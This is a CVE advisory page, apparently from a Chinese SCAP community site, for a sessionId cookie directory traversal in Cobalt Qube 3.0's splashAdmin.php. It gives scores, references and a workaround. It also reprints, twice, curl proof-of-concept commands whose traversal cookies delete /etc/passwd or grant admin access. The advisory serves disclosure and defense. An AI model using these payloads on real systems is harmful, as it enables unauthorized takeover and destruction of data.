CVE-2002-1058
CVSS10.0
发布时间 :2002-10-04 00:00:00
修订时间 :2008-09-05 16:29:40
NMCOES    

[原文]Directory traversal vulnerability in splashAdmin.php for Cobalt Qube 3.0 allows local users and remote attackers, to gain privileges as the Qube Admin via .. (dot dot) sequences in the sessionId cookie that point to an alternate session file.


[CNNVD]Cobalt Qube验证可绕过漏洞(CNNVD-200210-124)

        
        Cobalt Qube是一款SUN推出的电器型服务器产品。
        Cobalt Qube的验证机制对用户输入缺少正确过滤,远程攻击者可以利用这个漏洞获得管理员权限进行各种操作。
        Cobalt Qube的验证机制不够强壮,由于Cobalt Qube的验证机制没有正确验证由客户端Cookie中提供的输入,攻击者可以进行权限提升操作,或者引用服务器系统上的文件指为包含会话KEY的文件,利用验证服务漏洞,以管理员权限对这个引用的文件进行操作,如删除/etc/passwd文件中的部分内容。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1058
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1058
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200210-124
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/5297
(VENDOR_ADVISORY)  BID  5297
http://www.iss.net/security_center/static/9669.php
(VENDOR_ADVISORY)  XF  cobalt-qube-admin-access(9669)
http://archives.neohapsis.com/archives/bugtraq/2002-07/0261.html
(UNKNOWN)  BUGTRAQ  20020723 Cobalt Qube 3 Administration page

- 漏洞信息

Cobalt Qube验证可绕过漏洞
危急 输入验证
2002-10-04 00:00:00 2005-10-20 00:00:00
远程  
        
        Cobalt Qube是一款SUN推出的电器型服务器产品。
        Cobalt Qube的验证机制对用户输入缺少正确过滤,远程攻击者可以利用这个漏洞获得管理员权限进行各种操作。
        Cobalt Qube的验证机制不够强壮,由于Cobalt Qube的验证机制没有正确验证由客户端Cookie中提供的输入,攻击者可以进行权限提升操作,或者引用服务器系统上的文件指为包含会话KEY的文件,利用验证服务漏洞,以管理员权限对这个引用的文件进行操作,如删除/etc/passwd文件中的部分内容。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 编辑/usr/sausalito/ui/libPhp/ServerScriptHelper.php文件为如下代码:
        line 64:
        $sessionId = ereg_replace("\.\.","",$sessionId);
        厂商补丁:
        Cobalt
        ------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.cobalt.com/products/qube/

- 漏洞信息 (21640)

Cobalt Qube 3.0 Authentication Bypass Vulnerability (EDBID:21640)
php webapps
2002-07-24 Verified
0 pokley
N/A [点击下载]
source: http://www.securityfocus.com/bid/5297/info

A vulnerability has been reported for Cobalt Qube that may allow an attacker to bypass the authentication mechanism and obtain administrative privileges. 

The vulnerability occurs because of a weak authentication mechanism with Cobalt Qube appliances. The authentication mechanism fails to properly validate the input supplied in the client cookie. Thus it is possible for an attacker to refer to a file on the filesystem as that containing the session key. This vulnerability may be exploited by remote attackers to obtain administrative privileges on the device.

$curl -b sessionId=../../../../../../../../etc/passwd\;loginName=root:x:0:0:root:/root:/bin/bash
http://192.168.0.1:444/splashAdmin.php

This will allow the attacker to delete the password file.

The following will enable the attacker to obtain administrative credentials on the vulnerable system.
$curl -b sessionId=../codb/objects/4/.name\;loginName=admin
http://192.168.0.1:444/splashAdmin.php

$ curl -b sessionId=/../../../../../../tmp/test\;loginName=admin
http://192.168.0.1:444/splashAdmin.php		

- 漏洞信息

9053
Cobalt Qube splashAdmin.php sessionID Traversal Arbitrary File Access
Remote / Network Access Information Disclosure
Loss of Confidentiality
Exploit Public

- 漏洞描述

- 时间线

2002-07-24 Unknow
2002-07-24 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Cobalt Qube Authentication Bypass Vulnerability
Input Validation Error 5297
Yes No
2002-07-24 12:00:00 2009-07-11 02:56:00
Discovery credited to pokley <saleh@scan-associates.net>.

- 受影响的程序版本

Cobalt Qube 3.0

- 漏洞讨论

A vulnerability has been reported for Cobalt Qube that may allow an attacker to bypass the authentication mechanism and obtain administrative privileges.

The vulnerability occurs because of a weak authentication mechanism with Cobalt Qube appliances. The authentication mechanism fails to properly validate the input supplied in the client cookie. Thus it is possible for an attacker to refer to a file on the filesystem as that containing the session key. This vulnerability may be exploited by remote attackers to obtain administrative privileges on the device.

- 漏洞利用

The following proof of concepts were provided by pokley &lt;saleh@scan-associates.net&gt;:
$curl -b sessionId=../../../../../../../../etc/passwd\;loginName=root:x:0:0:root:/root:/bin/bash
http://192.168.0.1:444/splashAdmin.php

This will allow the attacker to delete the password file.

The following will enable the attacker to obtain administrative credentials on the vulnerable system.
$curl -b sessionId=../codb/objects/4/.name\;loginName=admin
http://192.168.0.1:444/splashAdmin.php

$ curl -b sessionId=/../../../../../../tmp/test\;loginName=admin
http://192.168.0.1:444/splashAdmin.php

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站